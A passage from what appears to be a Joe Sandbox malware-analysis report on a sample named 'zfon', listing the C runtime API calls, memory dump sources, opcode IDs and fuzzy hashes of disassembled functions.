                                                                                                • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25B3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25EC
                                                                                                • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25F6
                                                                                                • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2604
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpymemset$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 530858481-0
                                                                                                • Opcode ID: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                • Instruction ID: fe723e947157d56439f0a000ac368c34daa6e4f4561556c4584ff022581b18a0
                                                                                                • Opcode Fuzzy Hash: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                • Instruction Fuzzy Hash: 6A41AE22B09BC191EE14EF2AA5142A96355FB44FE0F584A31DF6D4B7D6DE7CE242C304
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC617
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC648
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC680
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC68A
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC6BB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2665656946-0
                                                                                                • Opcode ID: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                • Instruction ID: 60c9f492c125ce3ca31b3fc7ed246d63194bd291fda77b7d944694c4bdf4bc1c
                                                                                                • Opcode Fuzzy Hash: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                • Instruction Fuzzy Hash: 8F41D062B08A9191EE04EF2AE4096AE6365FB54FD4F544132EF5D07BA9DE7CE246C300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2665656946-0
                                                                                                • Opcode ID: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                • Instruction ID: 803599bd5aa181a20ee500ac7ce7768db680c4a878da74141004c109cab35c0a
                                                                                                • Opcode Fuzzy Hash: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                • Instruction Fuzzy Hash: DC313462708A8191DE00EF2AE9042AE7361FB48FD4F484532DF5D0BB56DE3CE152C304
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::$Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 826178784-0
                                                                                                • Opcode ID: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                • Instruction ID: be0f216689db4221ada2cde17dee223f4999b0de5784a2b921b308492e881ba4
                                                                                                • Opcode Fuzzy Hash: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                • Instruction Fuzzy Hash: 7E417E22B19A5698FB10CBA9E8A01BCB7A8BF15BC0B984032DB4D63795DF3CF415C340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                • Instruction ID: f6013f110e6b3832d8a9f1ffa5df238f0fba5f31030a14bb7dcd8d2f17a2985d
                                                                                                • Opcode Fuzzy Hash: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                • Instruction Fuzzy Hash: 50417F72618B8582EB609F15E8507A9B7B0FB88BD5F845032DB8E47A58DF3CD485CB60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3856544966-0
                                                                                                • Opcode ID: 8e17ec145e53769a2c641425164b26e1b6e40d98fb995a57eac84be446339539
                                                                                                • Instruction ID: f96666cc8f02640de51253928d317ae7bbfb07f34204bf7c11bb12423b19d67f
                                                                                                • Opcode Fuzzy Hash: 8e17ec145e53769a2c641425164b26e1b6e40d98fb995a57eac84be446339539
                                                                                                • Instruction Fuzzy Hash: 53318F32A08B4691EB14EF65E848369B371FB88790F810135D6AD07AE9CF7DD481C7A5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: 225472a601b65b387531f845988a81aac3dd013bdd7c23c631c239d08109b78f
                                                                                                • Instruction ID: 7d0ad30a399ccb4988979eb455d1bf60ba36eb455b54b7d97739cadb83a1b462
                                                                                                • Opcode Fuzzy Hash: 225472a601b65b387531f845988a81aac3dd013bdd7c23c631c239d08109b78f
                                                                                                • Instruction Fuzzy Hash: 20317E72618A82C2EF64DF11E8503A9A370FB98BD5F849031DA4E466A8DF3CD485C760
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: bce620b4b582b47963069ae1a1b446d6e6f47537035ff154e18360a55b9e623c
                                                                                                • Instruction ID: 0359120cb07ee1127a7a887f8d51fec63cf14a2e031479c346b35c89abb346c8
                                                                                                • Opcode Fuzzy Hash: bce620b4b582b47963069ae1a1b446d6e6f47537035ff154e18360a55b9e623c
                                                                                                • Instruction Fuzzy Hash: 13317C72618A8282EB649F15E8503A9E370FB98BD5F849031DA9E476A8DF3CD484C760
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: fa3fac953ba7f5670c52880217c483c6a0cee3ff45f13c0d2ce097923e961f99
                                                                                                • Instruction ID: 872d016b7a786da3a8c215d7fe57ed603b561b343a901bb8c9585f43565002b0
                                                                                                • Opcode Fuzzy Hash: fa3fac953ba7f5670c52880217c483c6a0cee3ff45f13c0d2ce097923e961f99
                                                                                                • Instruction Fuzzy Hash: 62316E72618A85C2EB64EF15E8543A9E370FB88BD4F885031DA9E476A8DF3CD584C760
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: 8268dcab7a56983feab380dfe6f9109ee8267f72ccab6befec655a4e3f35a947
                                                                                                • Instruction ID: 29c73497715df15b4be054f50f2cf193ab0dc679072b76fa3f5e9d14c4259c1f
                                                                                                • Opcode Fuzzy Hash: 8268dcab7a56983feab380dfe6f9109ee8267f72ccab6befec655a4e3f35a947
                                                                                                • Instruction Fuzzy Hash: D7316E72618A85C2DB64EF15E8503A9E370FB98BD4F885031DA9E476A8DF3CD584C7A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xtime_diff_to_millis2xtime_get$Mtx_reset_owner
                                                                                                • String ID:
                                                                                                • API String ID: 638720424-0
                                                                                                • Opcode ID: d059957066d422e0388afbfcbb9ff7b92e138296fa2b63c007ccbc5cfd8a943f
                                                                                                • Instruction ID: 013cb0991809ebd8770a9c92fc2edbf56a0c73dc9afab35000962e9e5c8b7065
                                                                                                • Opcode Fuzzy Hash: d059957066d422e0388afbfcbb9ff7b92e138296fa2b63c007ccbc5cfd8a943f
                                                                                                • Instruction Fuzzy Hash: 3221305271898186EE15EF2FE8516BA6361BF98FC4F848031EE4E47756DE3CD5079700
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F9709169
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F970917E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F970918E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F970919E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F97091AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: c61b8eca7707c6acc97522e83f7ba76b893d7a39df7e64e0ba538e7a668f895c
                                                                                                • Instruction ID: c6bb8243d03bb5a6b44a8b7e7b9259d2f45b7dc756146ac46de30394766f5669
                                                                                                • Opcode Fuzzy Hash: c61b8eca7707c6acc97522e83f7ba76b893d7a39df7e64e0ba538e7a668f895c
                                                                                                • Instruction Fuzzy Hash: 9E211E72A05B0991DB48AF69E89822C7376EB48FA5F804535CB2D033E8CF3CD48182B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                • String ID:
                                                                                                • API String ID: 3063020102-0
                                                                                                • Opcode ID: b7d7a0f5dd6735219fee2986d46814913f8ea3ccb4877a25bd0d6eac9163ac4b
                                                                                                • Instruction ID: f780f56dbfbb11b733e58b3c52410d63804af641b5dcc3924c48b528f4fe82e9
                                                                                                • Opcode Fuzzy Hash: b7d7a0f5dd6735219fee2986d46814913f8ea3ccb4877a25bd0d6eac9163ac4b
                                                                                                • Instruction Fuzzy Hash: 6B213322A0874691FB08BF25E848328A373EB45B99F840435DA6D036DDCF7DD4D183E6
                                                                                                APIs
                                                                                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F96FE241
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE26A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE27A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE28A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE297
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$strtoul
                                                                                                • String ID:
                                                                                                • API String ID: 1658144056-0
                                                                                                • Opcode ID: 94d14b2b1c7cf6c2facd01616af17b4eae40a61955ec83c18419d7b9d0e7b284
                                                                                                • Instruction ID: 1b05f11d318c728b4d3052cb3be8628cb1897b099b5f15f0372c6e5d54a6abbb
                                                                                                • Opcode Fuzzy Hash: 94d14b2b1c7cf6c2facd01616af17b4eae40a61955ec83c18419d7b9d0e7b284
                                                                                                • Instruction Fuzzy Hash: 10116361A1860651EF1ABF65BC5C139B372EF89BD5F804436D67E026EDFE2CE48045B0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CB5
